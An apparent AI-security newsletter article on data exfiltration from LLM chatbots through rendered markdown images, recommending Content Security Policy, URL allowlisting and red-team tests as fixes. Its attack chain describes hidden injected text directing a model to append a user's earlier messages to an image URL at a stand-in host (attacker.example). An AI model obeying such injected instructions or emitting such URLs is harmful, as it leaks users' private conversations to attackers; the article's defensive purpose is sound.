AI Sec Weekly
Isometric chatbot interface where injected markdown image URLs exfiltrate conversation data
news

How LLM Chatbots Leak Data Through Their Own Rendered Output

A recurring AI-security finding: an injected instruction makes the model emit a markdown image whose URL carries the user's data to an attacker server.

By AI Sec Weekly Editorial · · 8 min read

One vulnerability class keeps reappearing in AI-security write-ups under slightly different names, across many different chatbot products: data exfiltration through the model’s own rendered output. It is worth a standalone briefing because the root cause is almost never the model — it is the rendering layer the product team built around the model, and the fix is a web-security control most LLM teams have not applied to the chat surface.

The attack, end to end

The setup requires two ingredients that modern assistants routinely provide: the model can be influenced by untrusted content (via indirect prompt injection — a web page, a document, an email it processes), and the UI renders the model’s markdown, including images.

The chain:

  1. A user asks the assistant to summarize an attacker-controlled document or web page.
  2. Hidden text in that content instructs the model: take the user’s earlier messages (or retrieved private context) and append them, URL-encoded, to an image link pointing at an attacker server.
  3. The model, following the injected instruction, emits markdown like an inline image whose URL is https://attacker.example/log?d=<the user's data, url-encoded>.
  4. The chat UI renders the markdown. To display the “image,” the browser issues a GET request to the attacker’s server. The data is now in the attacker’s logs. No click is required; rendering is the trigger.

The user sees, at most, a broken image icon. The exfiltration already happened.

Why this keeps shipping

It recurs because the model and the UI are usually built by people reasoning about different threats. The model team is focused on what the model says. The UI team renders markdown because it makes responses look good. Neither owns the question “what happens when the model is induced to emit an attacker-chosen URL and our renderer dutifully fetches it.” The vulnerability lives in the seam between them, which is exactly the seam nobody is assigned to defend.

Output filtering at the model layer helps but is not sufficient — it is the same losing game as filtering injection on the input side. A determined payload will find an emission the filter does not catch.

The real fix is a browser control, not a model control

The durable mitigation is to deny the rendering layer the ability to make arbitrary outbound requests on the model’s behalf:

  • Content Security Policy. A restrictive img-src (and connect-src, frame-src, style-src) that allows only your own asset origins means an attacker-chosen image URL simply does not load. The browser refuses the request. This converts a working exfiltration channel into an inert broken-image icon. It is the highest-leverage control and most chat UIs ship without it.
  • URL allowlisting in the renderer. Before rendering model output, rewrite or strip image and link targets that are not on an allowlist. Defense in depth behind CSP, useful where CSP is hard to scope tightly.
  • Don’t auto-load remote media in chat at all. Many assistants have no legitimate need to inline arbitrary remote images from model output. Click-to-load, or no remote media, removes the channel entirely.
  • Treat model output as untrusted before it touches the DOM. The same principle as tool calls: anything the model emits that becomes a network request must clear a non-model check first.

What to check this week

  • Open your assistant’s chat UI and inspect the response Content-Security-Policy header. If img-src allows * or has no policy, you have the channel.
  • Trace what your renderer does with model-emitted markdown images and links. If it fetches them with no allowlist, that is the finding.
  • Add a deliberate test to your red-team set: an injected instruction that asks the model to encode prior context into an image URL. If the request reaches your test server, the vulnerability is live.
  • Prioritize CSP over output filtering. Filtering is an arms race; a tight img-src is a wall.

The summary that holds across every product this has hit: the model emitting a bad URL is not preventable, but the browser fetching it is. Fix the rendering layer, not just the prompt.

— Theo

Sources

  1. OWASP Top 10 for Large Language Model Applications
  2. Content Security Policy (CSP) — MDN Web Docs
  3. MITRE ATLAS — Adversarial Threat Landscape for AI Systems
Subscribe

AI Sec Weekly — in your inbox

Weekly digest of AI security news and analysis. — delivered when there's something worth your inbox.

No spam. Unsubscribe anytime.

Related

Comments